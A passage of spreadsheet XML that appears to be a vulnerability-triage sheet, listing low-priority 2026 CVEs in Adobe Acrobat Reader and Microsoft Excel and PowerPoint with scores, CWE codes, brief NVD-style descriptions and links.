t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1304" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office PowerPoint allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1304" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78513</t></is></c></row><row r="1305"><c r="A1305" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1305" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1305" s="5" t="inlineStr"><is><t>CVE-2026-79910</t></is></c><c r="D1305" s="5" t="n"><v>5.5</v></c><c r="E1305" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1305" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1305" s="5" t="inlineStr" /><c r="H1305" s="5" t="n"><v>0.002</v></c><c r="I1305" s="5" t="inlineStr" /><c r="J1305" s="5" t="inlineStr" /><c r="K1305" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1305" s="5" t="inlineStr" /><c r="M1305" s="5" t="inlineStr" /><c r="N1305" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1305" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1305" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1305" s="5" t="inlineStr" /><c r="R1305" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1305"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05" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-79910</t></is></c></row><row r="1306"><c r="A1306" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1306" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1306" s="5" t="inlineStr"><is><t>CVE-2026-80160</t></is></c><c r="D1306" s="5" t="n"><v>5.5</v></c><c r="E1306" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1306" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1306" s="5" t="inlineStr" /><c r="H1306" s="5" t="n"><v>0.002</v></c><c r="I1306" s="5" t="inlineStr" /><c r="J1306" s="5" t="inlineStr" /><c r="K1306" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1306" s="5" t="inlineStr" /><c r="M1306" s="5" t="inlineStr" /><c r="N1306" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1306" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1306" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1306" s="5" t="inlineStr" /><c r="R1306" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1306"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06" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80160</t></is></c></row><row r="1307"><c r="A1307" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1307" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1307" s="5" t="inlineStr"><is><t>CVE-2026-80162</t></is></c><c r="D1307" s="5" t="n"><v>5.5</v></c><c r="E1307" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1307" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1307" s="5" t="inlineStr" /><c r="H1307" s="5" t="n"><v>0.002</v></c><c r="I1307" s="5" t="inlineStr" /><c r="J1307" s="5" t="inlineStr" /><c r="K1307" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1307" s="5" t="inlineStr" /><c r="M1307" s="5" t="inlineStr" /><c r="N1307" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1307" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1307" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1307" s="5" t="inlineStr" /><c r="R1307" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1307" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1307" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-80162</t></is></c></row><row r="1308"><c r="A1308" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1308" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1308" s="5" t="inlineStr"><is><t>CVE-2026-81387</t></is></c><c r="D1308" s="5" t="n"><v>5.5</v></c><c r="E1308" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1308" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1308" s="5" t="inlineStr" /><c r="H1308" s="5" t="n"><v>0.004</v></c><c r="I1308" s="5" t="inlineStr" /><c r="J1308" s="5" t="inlineStr" /><c r="K1308" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1308" s="5" t="inlineStr" /><c r="M1308" s="5" t="inlineStr" /><c r="N1308" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1308" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1308" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1308" s="5" t="inlineStr" /><c r="R1308" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1308" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1308" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81387</t></is></c></row><row r="1309"><c r="A1309" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1309" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1309" s="5" t="inlineStr"><is><t>CVE-2026-81390</t></is></c><c r="D1309" s="5" t="n"><v>5.5</v></c><c r="E1309" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1309" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1309" s="5" t="inlineStr" /><c r="H1309" s="5" t="n"><v>0.004</v></c><c r="I1309" s="5" t="inlineStr" /><c r="J1309" s="5" t="inlineStr" /><c r="K1309" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L1309" s="5" t="inlineStr" /><c r="M1309" s="5" t="inlineStr" /><c r="N1309" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1309" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1309" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1309" s="5" t="inlineStr" /><c r="R1309" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1309" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1309" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81390</t></is></c></row><row r="1310"><c r="A1310" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1310" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1310" s="5" t="inlineStr"><is><t>CVE-2026-81391</t></is></c><c r="D1310" s="5" t="n"><v>5.5</v></c><c r="E1310" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1310" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1310" s="5" t="inlineStr" /><c r="H1310" s="5" t="n"><v>0.004</v></c><c r="I1310" s="5" t="inlineStr" /><c r="J1310" s="5" t="inlineStr" /><c r="K1310" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1310" s="5" t="inlineStr" /><c r="M1310" s="5" t="inlineStr" /><c r="N1310" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1310" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1310" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1310" s="5" t="inlineStr" /><c r="R1310" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1310" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1310" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81391</t></is></c></row><row r="1311"><c r="A1311" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1311" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1311" s="5" t="inlineStr"><is><t>CVE-2026-81392</t></is></c><c r="D1311" s="5" t="n"><v>5.5</v></c><c r="E1311" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1311" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1311" s="5" t="inlineStr" /><c r="H1311" s="5" t="n"><v>0.005</v></c><c r="I1311" s="5" t="inlineStr" /><c r="J1311" s="5" t="inlineStr" /><c r="K1311" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1311" s="5" t="inlineStr" /><c r="M1311" s="5" t="inlineStr" /><c r="N1311" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1311" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1311" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1311" s="5" t="inlineStr" /><c r="R1311" s="5" t="inlineStr"><is><t>CWE-125, CWE-20</t></is></c><c r="S1311" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1311" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81392</t></is></c></row><row r="1312"><c r="A1312" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1312" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1312" s="5" t="inlineStr"><is><t>CVE-2026-81393</t></is></c><c r="D1312" s="5" t="n"><v>5.5</v></c><c r="E1312" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1312" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1312" s="5" t="inlineStr" /><c r="H1312" s="5" t="n"><v>0.004</v></c><c r="I1312" s="5" t="inlineStr" /><c r="J1312" s="5" t="inlineStr" /><c r="K1312" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1312" s="5" t="inlineStr" /><c r="M1312" s="5" t="inlineStr" /><c r="N1312" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1312" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1312" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1312" s="5" t="inlineStr" /><c r="R1312" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1312" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1312" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81393</t></is></c></row><row r="1313"><c r="A1313" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1313" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1313" s="5" t="inlineStr"><is><t>CVE-2026-81394</t></is></c><c r="D1313" s="5" t="n"><v>5.5</v></c><c r="E1313" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1313" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1313" s="5" t="inlineStr" /><c r="H1313" s="5" t="n"><v>0.004</v></c><c r="I1313" s="5" t="inlineStr" /><c r="J1313" s="5" t="inlineStr" /><c r="K1313" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1313" s="5" t="inlineStr" /><c r="M1313" s="5" t="inlineStr" /><c r="N1313" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1313" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1313" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1313" s="5" t="inlineStr" /><c r="R1313" s="5" t="inlineStr"><is><t>CWE-497</t></is></c><c r="S1313" s="5" t="inlineStr"><is><t>Exposure of sensitive system information to an unauthorized control sphere in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1313" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81394</t></is></c></row><row r="1314"><c r="A1314" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1314" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1314" s="5" t="inlineStr"><is><t>CVE-2026-81395</t></is></c><c r="D1314" s="5" t="n"><v>5.5</v></c><c r="E1314" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1314" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1314" s="5" t="inlineStr" /><c r="H1314" s="5" t="n"><v>0.005</v></c><c r="I1314" s="5" t="inlineStr" /><c r="J1314" s="5" t="inlineStr" /><c r="K1314" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1314" s="5" t="inlineStr" /><c r="M1314" s="5" t="inlineStr" /><c r="N1314" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1314" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1314" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1314" s="5" t="inlineStr" /><c r="R1314" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1314" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1314" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81395</t></is></c></row><row r="1315"><c r="A1315" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1315" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1315" s="5" t="inlineStr"><is><t>CVE-2026-81399</t></is></c><c r="D1315" s="5" t="n"><v>5.5</v></c><c r="E1315" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1315" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1315" s="5" t="inlineStr" /><c r="H1315" s="5" t="n"><v>0.004</v></c><c r="I1315" s="5" t="inlineStr" /><c r="J1315" s="5" t="inlineStr" /><c r="K1315" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1315" s="5" t="inlineStr" /><c r="M1315" s="5" t="inlineStr" /><c r="N1315" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1315" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1315" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1315" s="5" t="inlineStr" /><c r="R1315" s="5" t="inlineStr"><is><t>CWE-126</t></is></c><c r="S1315" s="5" t="inlineStr"><is><t>Buffer over-read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1315" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81399</t></is></c></row><row r="1316"><c r="A1316" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1316" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1316" s="5" t="inlineStr"><is><t>CVE-2026-81400</t></is></c><c r="D1316" s="5" t="n"><v>5.5</v></c><c r="E1316" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1316" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1316" s="5" t="inlineStr" /><c r="H1316" s="5" t="n"><v>0.004</v></c><c r="I1316" s="5" t="inlineStr" /><c r="J1316" s="5" t="inlineStr" /><c r="K1316" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1316" s="5" t="inlineStr" /><c r="M1316" s="5" t="inlineStr" /><c r="N1316" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1316" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1316" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1316" s="5" t="inlineStr" /><c r="R1316" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1316" s="5" t="inlineStr"><is><t>Out-of-bounds read in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1316" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81400</t></is></c></row><row r="1317"><c r="A1317" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1317" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1317" s="5" t="inlineStr"><is><t>CVE-2026-81401</t></is></c><c r="D1317" s="5" t="n"><v>5.5</v></c><c r="E1317" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1317" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1317" s="5" t="inlineStr" /><c r="H1317" s="5" t="n"><v>0.005</v></c><c r="I1317" s="5" t="inlineStr" /><c r="J1317" s="5" t="inlineStr" /><c r="K1317" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024, microsoft:office_online_server</t></is></c><c r="L1317" s="5" t="inlineStr" /><c r="M1317" s="5" t="inlineStr" /><c r="N1317" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1317" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1317" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1317" s="5" t="inlineStr" /><c r="R1317" s="5" t="inlineStr"><is><t>CWE-843</t></is></c><c r="S1317" s="5" t="inlineStr"><is><t>Access of resource using incompatible type ('type confusion') in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1317" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81401</t></is></c></row><row r="1318"><c r="A1318" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1318" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1318" s="5" t="inlineStr"><is><t>CVE-2026-81958</t></is></c><c r="D1318" s="5" t="n"><v>5.5</v></c><c r="E1318" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1318" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1318" s="5" t="inlineStr" /><c r="H1318" s="5" t="n"><v>0.004</v></c><c r="I1318" s="5" t="inlineStr" /><c r="J1318" s="5" t="inlineStr" /><c r="K1318" s="5" t="inlineStr"><is><t>microsoft:365_apps, microsoft:excel, microsoft:microsoft_365, microsoft:office_2016, microsoft:office_2019, microsoft:office_2021, microsoft:office_2024</t></is></c><c r="L1318" s="5" t="inlineStr" /><c r="M1318" s="5" t="inlineStr" /><c r="N1318" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1318" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1318" s="5" t="inlineStr"><is><t>2026-09-17</t></is></c><c r="Q1318" s="5" t="inlineStr" /><c r="R1318" s="5" t="inlineStr"><is><t>CWE-908</t></is></c><c r="S1318" s="5" t="inlineStr"><is><t>Use of uninitialized resource in Microsoft Office Excel allows an unauthorized attacker to disclose information locally.</t></is></c><c r="T1318" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81958</t></is></c></row><row r="1319"><c r="A1319" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1319" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1319" s="5" t="inlineStr"><is><t>CVE-2026-81977</t></is></c><c r="D1319" s="5" t="n"><v>5.5</v></c><c r="E1319" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1319" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1319" s="5" t="inlineStr" /><c r="H1319" s="5" t="n"><v>0.002</v></c><c r="I1319" s="5" t="inlineStr" /><c r="J1319" s="5" t="inlineStr" /><c r="K1319" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1319" s="5" t="inlineStr" /><c r="M1319" s="5" t="inlineStr" /><c r="N1319" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1319" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1319" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1319" s="5" t="inlineStr" /><c r="R1319" s="5" t="inlineStr"><is><t>CWE-191</t></is></c><c r="S1319" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an Integer Underflow (Wrap or Wraparound) vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1319" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81977</t></is></c></row><row r="1320"><c r="A1320" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1320" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1320" s="5" t="inlineStr"><is><t>CVE-2026-81978</t></is></c><c r="D1320" s="5" t="n"><v>5.5</v></c><c r="E1320" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1320" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1320" s="5" t="inlineStr" /><c r="H1320" s="5" t="n"><v>0.002</v></c><c r="I1320" s="5" t="inlineStr" /><c r="J1320" s="5" t="inlineStr" /><c r="K1320" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1320" s="5" t="inlineStr" /><c r="M1320" s="5" t="inlineStr" /><c r="N1320" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1320" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1320" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1320" s="5" t="inlineStr" /><c r="R1320" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1320"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20" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81978</t></is></c></row><row r="1321"><c r="A1321" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1321" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1321" s="5" t="inlineStr"><is><t>CVE-2026-81982</t></is></c><c r="D1321" s="5" t="n"><v>5.5</v></c><c r="E1321" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1321" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1321" s="5" t="inlineStr" /><c r="H1321" s="5" t="n"><v>0.002</v></c><c r="I1321" s="5" t="inlineStr" /><c r="J1321" s="5" t="inlineStr" /><c r="K1321" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1321" s="5" t="inlineStr" /><c r="M1321" s="5" t="inlineStr" /><c r="N1321" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1321" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1321" s="5" t="inlineStr"><is><t>2026-09-11</t></is></c><c r="Q1321" s="5" t="inlineStr" /><c r="R1321" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1321"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21" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81982</t></is></c></row><row r="1322"><c r="A1322" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1322" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1322" s="5" t="inlineStr"><is><t>CVE-2026-81984</t></is></c><c r="D1322" s="5" t="n"><v>5.5</v></c><c r="E1322" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1322" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1322" s="5" t="inlineStr" /><c r="H1322" s="5" t="n"><v>0.002</v></c><c r="I1322" s="5" t="inlineStr" /><c r="J1322" s="5" t="inlineStr" /><c r="K1322" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1322" s="5" t="inlineStr" /><c r="M1322" s="5" t="inlineStr" /><c r="N1322" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1322" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1322" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1322" s="5" t="inlineStr" /><c r="R1322" s="5" t="inlineStr"><is><t>CWE-416</t></is></c><c r="S1322" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Use After Free vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1322" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81984</t></is></c></row><row r="1323"><c r="A1323" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1323" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1323" s="5" t="inlineStr"><is><t>CVE-2026-81991</t></is></c><c r="D1323" s="5" t="n"><v>5.5</v></c><c r="E1323" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1323" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1323" s="5" t="inlineStr" /><c r="H1323" s="5" t="n"><v>0.002</v></c><c r="I1323" s="5" t="inlineStr" /><c r="J1323" s="5" t="inlineStr" /><c r="K1323" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1323" s="5" t="inlineStr" /><c r="M1323" s="5" t="inlineStr" /><c r="N1323" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1323" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1323" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1323" s="5" t="inlineStr" /><c r="R1323" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="S1323" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by an out-of-bounds read vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to disclose sensitive information. Exploitation of this issue requires user interaction in that a victim must open a malicious file.</t></is></c><c r="T1323" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-81991</t></is></c></row><row r="1324"><c r="A1324" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1324" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1324" s="5" t="inlineStr"><is><t>CVE-2026-81993</t></is></c><c r="D1324" s="5" t="n"><v>5.5</v></c><c r="E1324" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1324" s="5" t="inlineStr"><is><t>psirt@adobe.com</t></is></c><c r="G1324" s="5" t="inlineStr" /><c r="H1324" s="5" t="n"><v>0.002</v></c><c r="I1324" s="5" t="inlineStr" /><c r="J1324" s="5" t="inlineStr" /><c r="K1324" s="5" t="inlineStr"><is><t>adobe:acrobat, adobe:acrobat_dc, adobe:acrobat_reader_dc, apple:macos, microsoft:windows</t></is></c><c r="L1324" s="5" t="inlineStr" /><c r="M1324" s="5" t="inlineStr" /><c r="N1324" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1324" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1324" s="5" t="inlineStr"><is><t>2026-09-10</t></is></c><c r="Q1324" s="5" t="inlineStr" /><c r="R1324" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="S1324" s="5" t="inlineStr"><is><t>Acrobat Reader is affected by a Heap-based Buffer Overflow vulnerability that could lead to disclosure of sensitive memory. An attacker could leverage this vulnerability to 